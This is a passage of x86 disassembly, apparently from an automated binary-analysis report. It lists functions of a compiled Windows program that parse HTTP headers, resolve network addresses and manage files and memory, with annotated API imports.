0041DA95 mov eax, dword ptr [eax+2Ch]
0041DA98 mov edx, dword ptr [ebp-3Ch]
0041DA9B mov ecx, dword ptr [eax]
0041DA9D call dword ptr [ecx+38h]
0041DAA0 mov edx, dword ptr [ebp-3Ch]
0041DAA3 mov eax, dword ptr [ebp-04h]
0041DAA6 call 0041CEA8h
0041DAAB jmp 0041DAD0h
0041DAAD lea eax, dword ptr [ebp-3Ch] xrefs 0041DA90
0041DAB0 mov edx, 0041E064h
0041DAB5 call 00404680h
0041DABA mov eax, dword ptr [ebp-04h]
0041DABD mov eax, dword ptr [eax+30h]
0041DAC0 mov edx, dword ptr [ebp-3Ch]
0041DAC3 call 00415A90h
0041DAC8 mov eax, dword ptr [ebp-04h]
0041DACB xor edx, edx
0041DACD mov dword ptr [eax+58h], edx
0041DAD0 mov eax, dword ptr [ebp-04h] xrefs 0041DAAB
0041DAD3 mov eax, dword ptr [eax+1Ch]
0041DAD6 cmp dword ptr [eax+000001B8h], 00000000h
0041DADD jne 0041DAFCh
0041DADF mov eax, dword ptr [ebp-04h]
0041DAE2 cmp dword ptr [eax+58h], 64h
0041DAE6 je 0041DA48h
0041DAEC jmp 0041DAFCh
0041DAEE mov eax, dword ptr [ebp-04h] xrefs 0041DA42
0041DAF1 mov eax, dword ptr [eax+2Ch]
0041DAF4 mov edx, dword ptr [ebp-10h]
0041DAF7 mov ecx, dword ptr [eax]
0041DAF9 call dword ptr [ecx+38h]
0041DAFC mov eax, dword ptr [ebp-04h] xrefs 0041DADD, 0041DAEC
0041DAFF mov eax, dword ptr [eax+38h]
0041DB02 mov edx, 0041DE64h ASCII "1.1"
0041DB07 call 004047C4h
0041DB0C setne byte ptr [ebp-11h]
0041DB10 mov eax, dword ptr [ebp-04h]
0041DB13 mov eax, dword ptr [eax+2Ch]
0041DB16 mov edx, dword ptr [eax]
0041DB18 call dword ptr [edx+14h]
0041DB1B test eax, eax
0041DB1D jng 0041DD0Eh
0041DB23 mov dl, 01h
0041DB25 mov eax, dword ptr [0040FD08h] 0040FD54
0041DB2A call 004036D8h
0041DB2F mov dword ptr [ebp-4Ch], eax
0041DB32 xor eax, eax
0041DB34 push ebp
0041DB35 push 0041DD07h
0041DB3A push dword ptr fs:[eax]
0041DB3D mov dword ptr fs:[eax], esp
0041DB40 lea ecx, dword ptr [ebp-3Ch] xrefs 0041DB72
0041DB43 mov eax, dword ptr [ebp-04h]
0041DB46 mov edx, dword ptr [eax+10h]
0041DB49 mov eax, dword ptr [ebp-04h]
0041DB4C mov eax, dword ptr [eax+1Ch]
0041DB4F mov ebx, dword ptr [eax]
0041DB51 call dword ptr [ebx+50h]
0041DB54 mov edx, dword ptr [ebp-3Ch]
0041DB57 mov eax, dword ptr [ebp-4Ch]
0041DB5A mov ecx, dword ptr [eax]
0041DB5C call dword ptr [ecx+38h]
0041DB5F cmp dword ptr [ebp-3Ch], 00000000h
0041DB63 je 0041DB74h
0041DB65 mov eax, dword ptr [ebp-04h]
0041DB68 mov eax, dword ptr [eax+1Ch]
0041DB6B cmp dword ptr [eax+000001B8h], 00000000h
0041DB72 je 0041DB40h
0041DB74 xor eax, eax xrefs 0041DB63
0041DB76 mov dword ptr [ebp-50h], eax
0041DB79 jmp 0041DCE0h
0041DB7E lea ecx, dword ptr [ebp-3Ch] xrefs 0041DCEB
0041DB81 lea edx, dword ptr [ebp-50h]
0041DB84 mov eax, dword ptr [ebp-4Ch]
0041DB87 call 00415AECh
0041DB8C mov eax, dword ptr [ebp-04h]
0041DB8F mov eax, dword ptr [eax+2Ch]
0041DB92 mov edx, dword ptr [ebp-3Ch]
0041DB95 mov ecx, dword ptr [eax]
0041DB97 call dword ptr [ecx+38h]
0041DB9A lea edx, dword ptr [ebp-40h]
0041DB9D mov eax, dword ptr [ebp-3Ch]
0041DBA0 call 00407284h
0041DBA5 mov edx, dword ptr [ebp-40h]
0041DBA8 mov eax, 0041E070h ASCII "CONTENT-LENGTH:"
0041DBAD call 00404960h
0041DBB2 dec eax
0041DBB3 jne 0041DC00h
0041DBB5 lea ecx, dword ptr [ebp-000000E8h]
0041DBBB mov edx, 0041E038h
0041DBC0 mov eax, dword ptr [ebp-3Ch]
0041DBC3 call 00415250h
0041DBC8 mov eax, dword ptr [ebp-000000E8h]
0041DBCE lea edx, dword ptr [ebp-000000E4h]
0041DBD4 call 004073FCh
0041DBD9 mov eax, dword ptr [ebp-000000E4h]
0041DBDF or edx, FFFFFFFFh
0041DBE2 call 00407608h
0041DBE7 mov dword ptr [ebp-18h], eax
0041DBEA cmp dword ptr [ebp-18h], FFFFFFFFh
0041DBEE je 0041DC00h
0041DBF0 mov eax, dword ptr [ebp-04h]
0041DBF3 cmp byte ptr [eax+20h], 00000000h
0041DBF7 jne 0041DC00h
0041DBF9 mov eax, dword ptr [ebp-04h]
0041DBFC mov byte ptr [eax+20h], 00000001h
0041DC00 mov edx, dword ptr [ebp-40h] xrefs 0041DBB3, 0041DBEE, 0041DBF7
0041DC03 mov eax, 0041E088h ASCII "CONTENT-TYPE:"
0041DC08 call 00404960h
0041DC0D dec eax
0041DC0E jne 0041DC45h
0041DC10 lea ecx, dword ptr [ebp-000000F0h]
0041DC16 mov edx, 0041E038h
0041DC1B mov eax, dword ptr [ebp-3Ch]
0041DC1E call 00415250h
0041DC23 mov eax, dword ptr [ebp-000000F0h]
0041DC29 lea edx, dword ptr [ebp-000000ECh]
0041DC2F call 004073FCh
0041DC34 mov edx, dword ptr [ebp-000000ECh]
0041DC3A mov eax, dword ptr [ebp-04h]
0041DC3D add eax, 34h
0041DC40 call 00404430h
0041DC45 mov edx, dword ptr [ebp-40h] xrefs 0041DC0E
0041DC48 mov eax, 0041E0A0h ASCII "TRANSFER-ENCODING:"
0041DC4D call 00404960h
0041DC52 dec eax
0041DC53 jne 0041DC8Eh
0041DC55 lea ecx, dword ptr [ebp-000000F4h]
0041DC5B mov edx, 0041E038h
0041DC60 mov eax, dword ptr [ebp-40h]
0041DC63 call 00415250h
0041DC68 mov eax, dword ptr [ebp-000000F4h]
0041DC6E lea edx, dword ptr [ebp-3Ch]
0041DC71 call 004073FCh
0041DC76 mov edx, dword ptr [ebp-3Ch]
0041DC79 mov eax, 0041E0BCh ASCII "CHUNKED"
0041DC7E call 00404960h
0041DC83 test eax, eax
0041DC85 jle 0041DC8Eh
0041DC87 mov eax, dword ptr [ebp-04h]
0041DC8A mov byte ptr [eax+20h], 00000002h
0041DC8E cmp byte ptr [ebp-45h], 00000000h xrefs 0041DC53, 0041DC85
0041DC92 je 0041DCBBh
0041DC94 mov edx, dword ptr [ebp-40h]
0041DC97 mov eax, 0041E0CCh ASCII "PROXY-CONNECTION:"
0041DC9C call 00404960h
0041DCA1 dec eax
0041DCA2 jne 0041DCE0h
0041DCA4 mov edx, dword ptr [ebp-40h]
0041DCA7 mov eax, 0041E0E8h ASCII "CLOSE"
0041DCAC call 00404960h
0041DCB1 test eax, eax
0041DCB3 jle 0041DCE0h
0041DCB5 mov byte ptr [ebp-11h], 00000001h
0041DCB9 jmp 0041DCE0h
0041DCBB mov edx, dword ptr [ebp-40h] xrefs 0041DC92
0041DCBE mov eax, 0041E0F8h ASCII "CONNECTION:"
0041DCC3 call 00404960h
0041DCC8 dec eax
0041DCC9 jne 0041DCE0h
0041DCCB mov edx, dword ptr [ebp-40h]
0041DCCE mov eax, 0041E0E8h ASCII "CLOSE"
0041DCD3 call 00404960h
0041DCD8 test eax, eax
0041DCDA jle 0041DCE0h
0041DCDC mov byte ptr [ebp-11h], 00000001h
0041DCE0 mov eax, dword ptr [ebp-4Ch] xrefs 0041DB79, 0041DCC9, 0041DCDA, 0041DCA2, 0041DCB3, 0041DCB9
0041DCE3 mov edx, dword ptr [eax]
0041DCE5 call dword ptr [edx+14h]
0041DCE8 cmp eax, dword ptr [ebp-50h]
0041DCEB jg 0041DB7Eh
0041DCF1 xor eax, eax
0041DCF3 pop edx
0041DCF5 pop ecx Count = 2
0041DCF6 mov dword ptr fs:[eax], edx
0041DCF9 push 0041DD0Eh
0041DCFE mov eax, dword ptr [ebp-4Ch] xrefs 0041DD0C
0041DD01 call 00403708h
0041DD06 ret function end
0041DD0E mov eax, dword ptr [ebp-04h] xrefs 0041DB1D
0041DD11 mov eax, dword ptr [eax+1Ch]
0041DD14 cmp dword ptr [eax+000001B8h], 00000000h
0041DD1B sete byte ptr [ebp-09h]
0041DD1F cmp byte ptr [ebp-09h], 00000000h
0041DD23 je 0041DE04h
0041DD29 mov eax, dword ptr [ebp-08h]
0041DD2C mov edx, 0041E10Ch
0041DD31 call 004047C4h
0041DD36 setne al
0041DD39 test al, al
0041DD3B je 0041DD49h
0041DD3D mov eax, dword ptr [ebp-04h]
0041DD40 cmp dword ptr [eax+58h], 000000CCh
0041DD47 jne 0041DD4Dh
0041DD49 xor eax, eax xrefs 0041DD3B
0041DD4B jmp 0041DD4Fh
0041DD4D mov al, 01h xrefs 0041DD47
0041DD4F test al, al xrefs 0041DD4B
0041DD51 je 0041DD5Fh
0041DD53 mov eax, dword ptr [ebp-04h]
0041DD56 cmp dword ptr [eax+58h], 00000130h
0041DD5D jne 0041DD63h
0041DD5F xor eax, eax xrefs 0041DD51
0041DD61 jmp 0041DD65h
0041DD63 mov al, 01h xrefs 0041DD5D
0041DD65 test al, al xrefs 0041DD61
0041DD67 je 0041DDA3h
0041DD69 mov eax, dword ptr [ebp-04h]
0041DD6C mov al, byte ptr [eax+20h]
0041DD6F sub al, 01h
0041DD71 jc 0041DD7Bh
0041DD73 je 0041DD88h
0041DD75 dec al
0041DD77 je 0041DD98h
0041DD79 jmp 0041DDA3h
0041DD7B mov eax, dword ptr [ebp-04h] xrefs 0041DD71
0041DD7E call 0041E114h
0041DD83 mov byte ptr [ebp-09h], al
0041DD86 jmp 0041DDA3h
0041DD88 mov edx, dword ptr [ebp-18h] xrefs 0041DD73
0041DD8B mov eax, dword ptr [ebp-04h]
0041DD8E call 0041E1A0h
0041DD93 mov byte ptr [ebp-09h], al
0041DD96 jmp 0041DDA3h
0041DD98 mov eax, dword ptr [ebp-04h] xrefs 0041DD77
0041DD9B call 0041E1E4h
0041DDA0 mov byte ptr [ebp-09h], al
0041DDA3 mov eax, dword ptr [ebp-04h] xrefs 0041DD67, 0041DD86, 0041DD96, 0041DD79
0041DDA6 mov eax, dword ptr [eax+30h]
0041DDA9 xor ecx, ecx
0041DDAB xor edx, edx
0041DDAD mov ebx, dword ptr [eax]
0041DDAF call dword ptr [ebx+14h]
0041DDB2 cmp byte ptr [ebp-11h], 00000000h
0041DDB6 je 0041DDD9h
0041DDB8 mov eax, dword ptr [ebp-04h]
0041DDBB mov eax, dword ptr [eax+1Ch]
0041DDBE mov edx, dword ptr [eax]
0041DDC0 call dword ptr [edx+10h]
0041DDC3 mov eax, dword ptr [ebp-04h]
0041DDC6 add eax, 24h
0041DDC9 call 004043DCh
0041DDCE mov eax, dword ptr [ebp-04h]
0041DDD1 add eax, 28h
0041DDD4 call 004043DCh
0041DDD9 mov eax, dword ptr [ebp-04h] xrefs 0041DDB6
0041DDDC call 0041E308h
0041DDE1 jmp 0041DE04h
0041DDE3 mov eax, dword ptr [ebp-04h] xrefs 0041DA38
0041DDE6 mov eax, dword ptr [eax+1Ch]
0041DDE9 mov edx, dword ptr [eax]
0041DDEB call dword ptr [edx+10h]
0041DDEE mov eax, dword ptr [ebp-04h]
0041DDF1 add eax, 24h
0041DDF4 call 004043DCh
0041DDF9 mov eax, dword ptr [ebp-04h]
0041DDFC add eax, 28h
0041DDFF call 004043DCh
0041DE04 xor eax, eax xrefs 0041DA18, 0041DD23, 0041DDE1, 0041D85D, 0041D80B
0041DE06 pop edx
0041DE08 pop ecx Count = 2
0041DE09 mov dword ptr fs:[eax], edx
0041DE0C push 0041DE3Eh
0041DE11 lea eax, dword ptr [ebp-000000F4h] xrefs 0041DE3C
0041DE17 mov edx, 00000029h
0041DE1C call 00404400h
0041DE21 lea eax, dword ptr [ebp-44h]
0041DE24 mov edx, 0000000Bh
0041DE29 call 00404400h
0041DE2E lea eax, dword ptr [ebp-10h]
0041DE31 call 004043DCh
0041DE36 ret function end
Function 00401ACC, API count: 3, instr count: 62
APIs
  • LocalFree.KERNEL32, ref: 00401B0B
  • VirtualFree.KERNEL32, ref: 00401B2A
  • RtlDeleteCriticalSection.NTDLL, ref: 00401B9C
Address Instruction Meta Information
00401ACC push ebp xrefs 00405E83
00401ACD mov ebp, esp
00401ACF push ebx
00401AD0 cmp byte ptr [0042C5BCh], 00000000h
00401AD7 je 00401BA9h
00401ADD xor edx, edx
00401ADF push ebp
00401AE0 push 00401BA2h
00401AE5 push dword ptr fs:[edx]
00401AE8 mov dword ptr fs:[edx], esp
00401AEB cmp byte ptr [0042C045h], 00000000h
00401AF2 je 00401AFEh
00401AF4 push 0042C5C4h
00401AF9 call 00401364h
00401AFE mov byte ptr [0042C5BCh], 00000000h xrefs 00401AF2
00401B05 mov eax, dword ptr [0042C61Ch] 00147BC8
00401B0A push eax
00401B0B call 00401344h LocalFree@KERNEL32.DLL (Hidden Import)
00401B10 xor eax, eax
00401B12 mov dword ptr [0042C61Ch], eax
00401B17 mov ebx, dword ptr [0042C5E4h] 001491FC
00401B1D jmp 00401B31h
00401B1F push 00008000h xrefs 00401B37
00401B24 push 00000000h
00401B26 mov eax, dword ptr [ebx+08h]
00401B29 push eax
00401B2A call 00401354h VirtualFree@KERNEL32.DLL (Import)
00401B2F mov ebx, dword ptr [ebx]
00401B31 cmp ebx, 0042C5E4h xrefs 00401B1D
00401B37 jne 00401B1Fh
00401B39 mov eax, 0042C5E4h
00401B3E call 004013CCh
00401B43 mov eax, 0042C5F4h
00401B48 call 004013CCh
00401B4D mov eax, 0042C620h
00401B52 call 004013CCh
00401B57 mov eax, dword ptr [0042C5DCh] 00148BC8
00401B5C test eax, eax
00401B5E je 00401B77h
00401B60 mov edx, dword ptr [eax] xrefs 00401B75
00401B62 mov dword ptr [0042C5DCh], edx
00401B68 push eax
00401B69 call 00401344h
00401B6E mov eax, dword ptr [0042C5DCh] 00148BC8
00401B73 test eax, eax
00401B75 jne 00401B60h
00401B77 xor eax, eax xrefs 00401B5E
00401B79 pop edx
00401B7B pop ecx Count = 2
00401B7C mov dword ptr fs:[eax], edx
00401B7F push 00401BA9h
00401B84 cmp byte ptr [0042C045h], 00000000h xrefs 00401BA7
00401B8B je 00401B97h
00401B8D push 0042C5C4h
00401B92 call 0040136Ch
00401B97 push 0042C5C4h xrefs 00401B8B
00401B9C call 00401374h RtlDeleteCriticalSection@NTDLL.DLL (Hidden Import)
00401BA1 ret function end
00401BA9 pop ebx xrefs 00401AD7
00401BAA pop ebp
00401BAB ret function end
Function 0040B560, API count: 1, instr count: 37
APIs
  • GetACP.KERNEL32, ref: 0040B59F
Address Instruction Meta Information
0040B560 push ebp xrefs 0040B5E7
0040B561 mov ebp, esp
0040B563 add esp, FFFFFFF4h
0040B566 push ebx
0040B567 xor edx, edx
0040B569 mov dword ptr [ebp-0Ch], edx
0040B56C xor edx, edx
0040B56E push ebp
0040B56F push 0040B5C4h
0040B574 push dword ptr fs:[edx]
0040B577 mov dword ptr fs:[edx], esp
0040B57A push 00000007h
0040B57C lea edx, dword ptr [ebp-07h]
0040B57F push edx
0040B580 push 00001004h
0040B585 push eax
0040B586 call 004061BCh
0040B58B lea eax, dword ptr [ebp-0Ch]
0040B58E lea edx, dword ptr [ebp-07h]
0040B591 mov ecx, 00000007h
0040B596 call 0040464Ch
0040B59B mov eax, dword ptr [ebp-0Ch]
0040B59E push eax
0040B59F call 00406174h GetACP@KERNEL32.DLL (Hidden Import)
0040B5A4 mov edx, eax
0040B5A6 pop eax
0040B5A7 call 00407608h
0040B5AC mov ebx, eax
0040B5AE xor eax, eax
0040B5B0 pop edx
0040B5B2 pop ecx Count = 2
0040B5B3 mov dword ptr fs:[eax], edx
0040B5B6 push 0040B5CBh
0040B5BB lea eax, dword ptr [ebp-0Ch] xrefs 0040B5C9
0040B5BE call 004043DCh
0040B5C3 ret function end
Function 0041C1D4, API count: 0, instr count: 79
Address Instruction Meta Information
0041C1D4 push ebp
0041C1D5 mov ebp, esp
0041C1D7 add esp, FFFFFFF4h
0041C1DA push ebx
0041C1DB push esi
0041C1DC push edi
0041C1DD xor ebx, ebx
0041C1DF mov dword ptr [ebp-0Ch], ebx
0041C1E2 mov dword ptr [ebp-04h], ecx
0041C1E5 mov esi, edx
0041C1E7 mov ebx, eax
0041C1E9 xor eax, eax
0041C1EB push ebp
0041C1EC push 0041C2CBh
0041C1F1 push dword ptr fs:[eax]
0041C1F4 mov dword ptr fs:[eax], esp
0041C1F7 mov eax, dword ptr [ebx+00000200h]
0041C1FD cmp byte ptr [eax+08h], 00000000h
0041C201 je 0041C2A6h
0041C207 xor eax, eax
0041C209 mov dword ptr [ebp-08h], eax
0041C20C mov eax, ebx
0041C20E call 004186ECh
0041C213 test al, al
0041C215 jne 0041C2B5h
0041C21B mov eax, ebx
0041C21D call 0041949Ch
0041C222 lea eax, dword ptr [ebx+00000084h]
0041C228 push eax
0041C229 mov ecx, dword ptr [ebx+00000080h]
0041C22F mov edx, dword ptr [ebp-04h]
0041C232 mov eax, ebx
0041C234 call 004185FCh
0041C239 mov ecx, dword ptr [ebp-04h]
0041C23C mov edx, esi
0041C23E mov eax, dword ptr [ebx+00000200h]
0041C244 mov edi, dword ptr [eax]
0041C246 call dword ptr [edi+28h]
0041C249 mov dword ptr [ebp-08h], eax
0041C24C mov eax, dword ptr [ebx+00000200h]
0041C252 cmp dword ptr [eax+0Ch], 00000000h
0041C256 je 0041C262h
0041C258 mov dword ptr [ebx+000001B8h], 0000276Bh
0041C262 mov eax, ebx xrefs 0041C256
0041C264 call 0041952Ch
0041C269 mov eax, dword ptr [ebp-08h]
0041C26C add dword ptr [ebx+0000019Ch], eax
0041C272 lea edx, dword ptr [ebp-0Ch]
0041C275 mov eax, dword ptr [ebp-08h]
0041C278 call 004074CCh
0041C27D mov ecx, dword ptr [ebp-0Ch]
0041C280 mov dl, 0Ah
0041C282 mov eax, ebx
0041C284 call 00419E70h
0041C289 mov eax, dword ptr [ebp-08h]
0041C28C push eax
0041C28D mov ecx, esi
0041C28F xor edx, edx
0041C291 mov eax, ebx
0041C293 call 00419F3Ch
0041C298 lea ecx, dword ptr [ebp-08h]
0041C29B mov edx, esi
0041C29D mov eax, ebx
0041C29F call 00419E88h
0041C2A4 jmp 0041C2B5h
0041C2A6 mov ecx, dword ptr [ebp-04h] xrefs 0041C201
0041C2A9 mov edx, esi
0041C2AB mov eax, ebx
0041C2AD call 00418AA4h
0041C2B2 mov dword ptr [ebp-08h], eax
0041C2B5 xor eax, eax xrefs 0041C215, 0041C2A4
0041C2B7 pop edx
0041C2B9 pop ecx Count = 2
0041C2BA mov dword ptr fs:[eax], edx
0041C2BD push 0041C2D2h
0041C2C2 lea eax, dword ptr [ebp-0Ch] xrefs 0041C2D0
0041C2C5 call 004043DCh
0041C2CA ret function end
Function 00412EF0, API count: 1, instr count: 4
APIs
  • ResetEvent.KERNEL32, ref: 00412EF6
Address Instruction Meta Information
00412EF0 mov eax, dword ptr [0042C848h] 00000048 xrefs 00412F8C, 00412F0F
00412EF5 push eax
00412EF6 call 00406264h ResetEvent@KERNEL32.DLL (Hidden Import)
00412EFB ret function end
Function 0040F4F8, API count: 1, instr count: 42
APIs
  • InitializeCriticalSection.KERNEL32, ref: 0040F586
Address Instruction Meta Information
0040F4F8 push ebp
0040F4F9 mov ebp, esp
0040F4FB xor eax, eax
0040F4FD push ebp
0040F4FE push 0040F599h
0040F503 push dword ptr fs:[eax]
0040F506 mov dword ptr fs:[eax], esp
0040F509 sub dword ptr [0042C818h], 01h
0040F510 jnc 0040F58Bh
0040F512 mov eax, 0042C7F8h
0040F517 call 0040F0F4h
0040F51C mov eax, 0040D834h
0040F521 mov dword ptr [0042C808h], eax
0040F526 mov eax, 0040D45Ch
0040F52B mov dword ptr [0042C80Ch], eax
0040F530 mov edx, 0040D36Ch
0040F535 mov dword ptr [0042C810h], edx
0040F53B mov dword ptr [0042C814h], eax
0040F540 mov eax, 0040DB20h
0040F545 mov edx, dword ptr [0042B870h] 0042B010
0040F54B mov dword ptr [edx], eax
0040F54D mov eax, 0040EDE8h
0040F552 mov edx, dword ptr [0042B790h] 0042B014
0040F558 mov dword ptr [edx], eax
0040F55A mov eax, 0040DE34h
0040F55F mov edx, dword ptr [0042B8BCh] 0042B018
0040F565 mov dword ptr [edx], eax
0040F567 mov eax, 0040E160h
0040F56C mov edx, dword ptr [0042B964h] 0042B01C
0040F572 mov dword ptr [edx], eax
0040F574 mov eax, 0040E888h
0040F579 mov edx, dword ptr [0042B8C8h] 0042B020
0040F57F mov dword ptr [edx], eax
0040F581 push 0042C820h
0040F586 call 00406234h InitializeCriticalSection@KERNEL32.DLL (Hidden Import)
0040F58B xor eax, eax xrefs 0040F510
0040F58D pop edx
0040F58F pop ecx Count = 2
0040F590 mov dword ptr fs:[eax], edx
0040F593 push 0040F5A0h
0040F598 ret xrefs 0040F59E function end
Function 004052E0, API count: 0, instr count: 26
Address Instruction Meta Information
004052E0 push ebx xrefs 00405343
004052E1 push esi
004052E2 add esp, FFFFFEF8h
004052E8 mov ebx, eax
004052EA cmp dword ptr [ebx+10h], 00000000h
004052EE jne 0040531Bh
004052F0 push 00000105h
004052F5 lea eax, dword ptr [esp+04h]
004052F9 push eax
004052FA mov eax, dword ptr [ebx+04h]
004052FD push eax
004052FE call 00401258h
00405303 mov eax, esp
00405305 mov dl, 01h
00405307 call 0040551Ch
0040530C mov esi, eax
0040530E mov dword ptr [ebx+10h], esi
00405311 test esi, esi
00405313 jne 0040531Bh
00405315 mov eax, dword ptr [ebx+04h]
00405318 mov dword ptr [ebx+10h], eax
0040531B mov eax, dword ptr [ebx+10h] xrefs 004052EE, 00405313
0040531E add esp, 00000108h
00405324 pop esi
00405325 pop ebx
00405326 ret function end
Function 00412218, API count: 1, instr count: 17
APIs
  • SetEndOfFile.KERNEL32, ref: 00412231
Address Instruction Meta Information
00412218 push ebp
00412219 mov ebp, esp
0041221B push ebx
0041221C mov ebx, eax
0041221E push dword ptr [ebp+0Ch]
00412221 push dword ptr [ebp+08h]
00412224 xor edx, edx
00412226 mov eax, ebx
00412228 mov ecx, dword ptr [eax]
0041222A call dword ptr [ecx+18h]
0041222D mov eax, dword ptr [ebx+04h]
00412230 push eax
00412231 call 00406274h SetEndOfFile@KERNEL32.DLL (Hidden Import)
00412236 call 0040BBDCh
0041223B pop ebx
0041223C pop ebp
0041223D retn 0008h function end
Function 0041C2DC, API count: 0, instr count: 96
Address Instruction Meta Information
0041C2DC push ebp
0041C2DD mov ebp, esp
0041C2DF add esp, FFFFFFECh
0041C2E2 push ebx
0041C2E3 push esi
0041C2E4 xor ebx, ebx
0041C2E6 mov dword ptr [ebp-14h], ebx
0041C2E9 mov esi, ecx
0041C2EB mov dword ptr [ebp-04h], edx
0041C2EE mov ebx, eax
0041C2F0 xor eax, eax
0041C2F2 push ebp
0041C2F3 push 0041C407h
0041C2F8 push dword ptr fs:[eax]
0041C2FB mov dword ptr fs:[eax], esp
0041C2FE mov eax, dword ptr [ebx+00000200h]
0041C304 cmp byte ptr [eax+08h], 00000000h
0041C308 je 0041C3E2h
0041C30E xor eax, eax
0041C310 mov dword ptr [ebp-08h], eax
0041C313 mov eax, ebx
0041C315 call 004186ECh
0041C31A test al, al
0041C31C jne 0041C3F1h
0041C322 mov eax, ebx
0041C324 call 0041949Ch
0041C329 push esi
0041C32A mov ecx, dword ptr [ebp-04h]
0041C32D mov dl, 01h
0041C32F mov eax, ebx
0041C331 call 00419F3Ch
0041C336 mov dword ptr [ebp-10h], esi
0041C339 xor eax, eax
0041C33B mov dword ptr [ebp-0Ch], eax
0041C33E mov eax, dword ptr [ebp-0Ch]
0041C341 cmp eax, dword ptr [ebp-10h]
0041C344 jnl 0041C3D9h
0041C34A mov esi, dword ptr [ebp-10h] xrefs 0041C3D3
0041C34D sub esi, dword ptr [ebp-0Ch]
0041C350 mov eax, dword ptr [ebx+000001A4h]
0041C356 cmp esi, eax
0041C358 jle 0041C35Ch
0041C35A mov esi, eax
0041C35C test esi, esi xrefs 0041C358
0041C35E jle 0041C3D9h
0041C360 lea eax, dword ptr [ebx+7Ch]
0041C363 push eax
0041C364 mov ecx, dword ptr [ebx+78h]
0041C367 mov edx, esi
0041C369 mov eax, ebx
0041C36B call 004185FCh
0041C370 mov edx, dword ptr [ebp-0Ch]
0041C373 mov eax, dword ptr [ebp-04h]
0041C376 call 004159A0h
0041C37B mov ecx, esi
0041C37D mov edx, eax
0041C37F mov eax, dword ptr [ebx+00000200h]
0041C385 mov esi, dword ptr [eax]
0041C387 call dword ptr [esi+24h]
0041C38A mov esi, eax
0041C38C mov eax, dword ptr [ebx+00000200h]
0041C392 cmp dword ptr [eax+0Ch], 00000000h
0041C396 je 0041C3A2h
0041C398 mov dword ptr [ebx+000001B8h], 0000276Bh
0041C3A2 cmp dword ptr [ebx+000001B8h], 00000000h xrefs 0041C396
0041C3A9 jne 0041C3D9h
0041C3AB add dword ptr [ebp-0Ch], esi
0041C3AE add dword ptr [ebp-08h], esi
0041C3B1 add dword ptr [ebx+000001A0h], esi
0041C3B7 lea edx, dword ptr [ebp-14h]
0041C3BA mov eax, esi
0041C3BC call 004074CCh
0041C3C1 mov ecx, dword ptr [ebp-14h]
0041C3C4 mov dl, 0Bh
0041C3C6 mov eax, ebx
0041C3C8 call 00419E70h
0041C3CD mov eax, dword ptr [ebp-0Ch]
0041C3D0 cmp eax, dword ptr [ebp-10h]
0041C3D3 jl 0041C34Ah
0041C3D9 mov eax, ebx xrefs 0041C344, 0041C35E, 0041C3A9
0041C3DB call 0041952Ch
0041C3E0 jmp 0041C3F1h
0041C3E2 mov ecx, esi xrefs 0041C308
0041C3E4 mov edx, dword ptr [ebp-04h]
0041C3E7 mov eax, ebx
0041C3E9 call 00418720h
0041C3EE mov dword ptr [ebp-08h], eax
0041C3F1 xor eax, eax xrefs 0041C31C, 0041C3E0
0041C3F3 pop edx
0041C3F5 pop ecx Count = 2
0041C3F6 mov dword ptr fs:[eax], edx
0041C3F9 push 0041C40Eh
0041C3FE lea eax, dword ptr [ebp-14h] xrefs 0041C40C
0041C401 call 004043DCh
0041C406 ret function end
Function 004043D4, API count: 1, instr count: 3
APIs
  • ExitThread.KERNEL32, ref: 004043D5
Address Instruction Meta Information
004043D4 push eax xrefs 0041316C
004043D5 call 00401210h ExitThread@KERNEL32.DLL (Hidden Import)
004043DA ret function end
Function 004077F4, API count: 1, instr count: 33
APIs
  • CreateFileA.KERNEL32, ref: 00407842
Address Instruction Meta Information
004077F4 push ebx xrefs 00412334
004077F5 push esi
004077F6 push edi
004077F7 mov ebx, edx
004077F9 mov edi, eax
004077FB or eax, FFFFFFFFh
004077FE mov esi, ebx
00407800 and esi, 03h
00407803 cmp esi, 02h
00407806 jnbe 00407847h
00407808 mov edx, ebx
0040780A and edx, 000000F0h
00407810 cmp edx, 40h
00407813 jnbe 00407847h
00407815 push 00000000h
00407817 push 00000080h
0040781C push 00000003h
0040781E push 00000000h
00407820 mov eax, ebx
00407822 and eax, 000000F0h
00407827 shr eax, 04h
0040782A mov eax, dword ptr [0042B16Ch+eax*4]
00407831 push eax
00407832 mov eax, dword ptr [0042B160h+esi*4]
00407839 push eax
0040783A mov eax, edi
0040783C call 00404878h
00407841 push eax
00407842 call 0040610Ch CreateFileA@KERNEL32.DLL (Hidden Import)
00407847 pop edi xrefs 00407806, 00407813
00407848 pop esi
00407849 pop ebx
0040784A ret function end
Function 004144AC, API count: 5, instr count: 147
APIs
  • inet_addr.WS2_32, ref: 004144FB
  • gethostbyaddr.WS2_32, ref: 0041452E
  • getaddrinfo.WS2_32, ref: 004145AA
  • getnameinfo.WS2_32, ref: 004145FC
  • FreeAddrInfoW.WS2_32, ref: 0041462E
Address Instruction Meta Information
004144AC push ebp xrefs 004199EC
004144AD mov ebp, esp
004144AF add esp, FFFFFFCCh
004144B2 push ebx
004144B3 push esi
004144B4 push edi
004144B5 xor ebx, ebx
004144B7 mov dword ptr [ebp-0Ch], ebx
004144BA mov dword ptr [ebp-10h], ebx
004144BD mov edi, ecx
004144BF mov esi, edx
004144C1 mov dword ptr [ebp-04h], eax
004144C4 mov ebx, dword ptr [ebp+08h]
004144C7 mov eax, dword ptr [ebp-04h]
004144CA call 00404868h
004144CF xor eax, eax
004144D1 push ebp
004144D2 push 0041465Fh
004144D7 push dword ptr fs:[eax]
004144DA mov dword ptr fs:[eax], esp
004144DD mov eax, ebx
004144DF mov edx, dword ptr [ebp-04h]
004144E2 call 00404430h
004144E7 mov eax, esi
004144E9 call 00413B74h
004144EE test al, al
004144F0 jne 00414562h
004144F2 mov eax, dword ptr [ebp-04h]
004144F5 call 00404878h
004144FA push eax
004144FB call dword ptr [0042B420h] inet_addr@WS2_32.DLL (Hidden Import)
00414501 mov dword ptr [ebp-14h], eax
00414504 cmp dword ptr [ebp-14h], FFFFFFFFh
00414508 je 0041463Ch
0041450E mov eax, dword ptr [0042C8A4h] 00960A4C
00414513 call 00413914h
00414518 xor eax, eax
0041451A push ebp
0041451B push 0041455Bh
00414520 push dword ptr fs:[eax]
00414523 mov dword ptr fs:[eax], esp
00414526 push 00000002h
00414528 push 00000004h
0041452A lea eax, dword ptr [ebp-14h]
0041452D push eax
0041452E call dword ptr [0042B3E8h] gethostbyaddr@WS2_32.DLL (Hidden Import)
00414534 mov esi, eax
00414536 test esi, esi
00414538 je 00414543h
0041453A mov eax, ebx
0041453C mov edx, dword ptr [esi]
0041453E call 004045D4h
00414543 xor eax, eax xrefs 00414538
00414545 pop edx
